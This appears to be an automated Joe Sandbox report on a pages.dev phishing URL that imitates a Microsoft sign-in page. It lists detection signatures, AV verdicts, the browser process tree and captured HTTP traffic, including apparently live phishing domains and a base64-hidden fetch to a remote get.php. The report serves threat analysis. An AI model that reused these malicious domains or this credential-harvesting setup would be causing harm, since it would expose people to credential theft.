Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev/

Overview

General Information

Sample URL:	https://bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev/
Analysis ID:	1502357
Infos:

Detection

HTMLPhisher

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected HtmlPhish10

Found HTTP page in a blob

Phishing site detected (based on image similarity)

Phishing site detected (based on logo match)

Detected non-DNS traffic on DNS port

HTML body contains password input but no form action

HTML page contains hidden javascript code

Invalid 'forgot password' link found

Classification

×

Process Tree

System is w10x64

chrome.exe (PID: 2020 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 2732 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=1996,i,7857939130896594004,14220038804681611000,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 6504 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev/" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

HTML

Source	Rule	Description	Author	Strings
3.2.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: https://bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev/	Avira URL Cloud: detection malicious, Label: phishing
Source: https://bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev/	SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social usering

Antivirus detection for URL or domain

Source: https://palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev/favicon.ico	Avira URL Cloud: Label: phishing
Source: https://bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev/favicon.ico	Avira URL Cloud: Label: phishing
Source: https://palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev/890f5e421912d83086e5dcc2/86b1d9943b8c18420153e7?c69r153=itqf80n&8ls1t3xz=e96619c0f41e457dc67526ff68a2&5tw8bsx7e=87dc22878e019397c649b8	Avira URL Cloud: Label: phishing

Multi AV Scanner detection for domain / URL

Source: fetchlnk.truesharingzone.site	Virustotal: Detection: 11%			Perma Link
Source: bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev	Virustotal: Detection: 12%			Perma Link

Multi AV Scanner detection for submitted file

Source: https://bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev/

Virustotal: Detection: 11%

Phishing

AI detected phishing page

Source: blob:https://palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev/694e13db-ccb0-49ee-90aa-9a2d7f0a11af

LLM: Score: 8 Reasons: The domain name 'palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev' does not match the brand name Microsoft, and the.dev top-level domain is not commonly associated with Microsoft. The unusual domain name and top-level domain increase the likelihood of this being a phishing site. DOM: 3.2.pages.csv

Yara detected HtmlPhish10

Source: Yara match

File source: 3.2.pages.csv, type: HTML

Found HTTP page in a blob

Source: blob:https://palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev/694e13db-ccb0-49ee-90aa-9a2d7f0a11af

DOM page: Blob-based

Phishing site detected (based on image similarity)

Source: blob:https://palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev/694e13db-ccb0-49ee-90aa-9a2d7f0a11af

Matcher: Found strong image similarity, brand: MICROSOFT

Phishing site detected (based on logo match)

Source: blob:https://palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev/694e13db-ccb0-49ee-90aa-9a2d7f0a11af

Matcher: Template: microsoft matched

Source: blob:https://palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev/694e13db-ccb0-49ee-90aa-9a2d7f0a11af

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: https://bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev/

HTTP Parser: Base64 decoded: https://fetchlnk.truesharingzone.site/get.php

Source: blob:https://palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev/694e13db-ccb0-49ee-90aa-9a2d7f0a11af

HTTP Parser: Invalid link: Forgot password?

Source: blob:https://palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev/694e13db-ccb0-49ee-90aa-9a2d7f0a11af

HTTP Parser: <input type="password" .../> found

Source: https://bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev/	HTTP Parser: No favicon
Source: https://palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev/890f5e421912d83086e5dcc2/86b1d9943b8c18420153e7/?c69r153=itqf80n&8ls1t3xz=e96619c0f41e457dc67526ff68a2&5tw8bsx7e=87dc22878e019397c649b8	HTTP Parser: No favicon
Source: blob:https://palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev/694e13db-ccb0-49ee-90aa-9a2d7f0a11af	HTTP Parser: No favicon
Source: https://signup.live.com/signup?sru=https%3a%2f%2flogin.live.com%2foauth20_authorize.srf%3flc%3d1033%26mkt%3den-US%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26opid%3d9F8019300768C2D0%26opidt%3d1725144893%26uaid%3db58882512b7c40d78c42f4d88f1affac%26contextid%3d679ADA4DB0EC0A86%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=b58882512b7c40d78c42f4d88f1affac&suc=4345a7b9-9a63-4910-a426-35363201d503&lic=1	HTTP Parser: No favicon
Source: https://signup.live.com/signup?sru=https%3a%2f%2flogin.live.com%2foauth20_authorize.srf%3flc%3d1033%26mkt%3den-US%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26opid%3d9F8019300768C2D0%26opidt%3d1725144893%26uaid%3db58882512b7c40d78c42f4d88f1affac%26contextid%3d679ADA4DB0EC0A86%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=b58882512b7c40d78c42f4d88f1affac&suc=4345a7b9-9a63-4910-a426-35363201d503&lic=1	HTTP Parser: No favicon
Source: https://signup.live.com/signup?sru=https%3a%2f%2flogin.live.com%2foauth20_authorize.srf%3flc%3d1033%26mkt%3den-US%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26opid%3d9F8019300768C2D0%26opidt%3d1725144893%26uaid%3db58882512b7c40d78c42f4d88f1affac%26contextid%3d679ADA4DB0EC0A86%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=b58882512b7c40d78c42f4d88f1affac&suc=4345a7b9-9a63-4910-a426-35363201d503&lic=1	HTTP Parser: No favicon
Source: https://signup.live.com/signup?sru=https%3a%2f%2flogin.live.com%2foauth20_authorize.srf%3flc%3d1033%26mkt%3den-US%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26opid%3d9F8019300768C2D0%26opidt%3d1725144893%26uaid%3db58882512b7c40d78c42f4d88f1affac%26contextid%3d679ADA4DB0EC0A86%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=b58882512b7c40d78c42f4d88f1affac&suc=4345a7b9-9a63-4910-a426-35363201d503&lic=1	HTTP Parser: No favicon

Source: blob:https://palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev/694e13db-ccb0-49ee-90aa-9a2d7f0a11af

HTTP Parser: No <meta name="author".. found

Source: blob:https://palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev/694e13db-ccb0-49ee-90aa-9a2d7f0a11af

HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50608 version: TLS 1.2

Source: global traffic

TCP traffic: 192.168.2.6:50603 -> 1.1.1.1:53

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /890f5e421912d83086e5dcc2/86b1d9943b8c18420153e7?c69r153=itqf80n&8ls1t3xz=e96619c0f41e457dc67526ff68a2&5tw8bsx7e=87dc22878e019397c649b8 HTTP/1.1Host: palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /890f5e421912d83086e5dcc2/86b1d9943b8c18420153e7/?c69r153=itqf80n&8ls1t3xz=e96619c0f41e457dc67526ff68a2&5tw8bsx7e=87dc22878e019397c649b8 HTTP/1.1Host: palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.devConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /get.php HTTP/1.1Host: fetchlnk.truesharingzone.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /thegifloader/loading.gif HTTP/1.1Host: theextrenalfiles.filesdistributorin.onlineConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev/890f5e421912d83086e5dcc2/86b1d9943b8c18420153e7/?c69r153=itqf80n&8ls1t3xz=e96619c0f41e457dc67526ff68a2&5tw8bsx7e=87dc22878e019397c649b8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /thegifloader/loading.gif HTTP/1.1Host: theextrenalfiles.filesdistributorin.onlineConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ests/2.1/content/cdnbundles/converged.v2.login.min_wixdbz3ubznoegxpcgkfog2.css HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ready-page.php HTTP/1.1Host: basicplan.filesdistributorin.onlineConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/ellipsis_635a63d500a92a0b8497cdc58d0f66b1.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/ellipsis_635a63d500a92a0b8497cdc58d0f66b1.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_yruqtyo0qslo70l4a-_ung2.js HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/ellipsis_635a63d500a92a0b8497cdc58d0f66b1.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
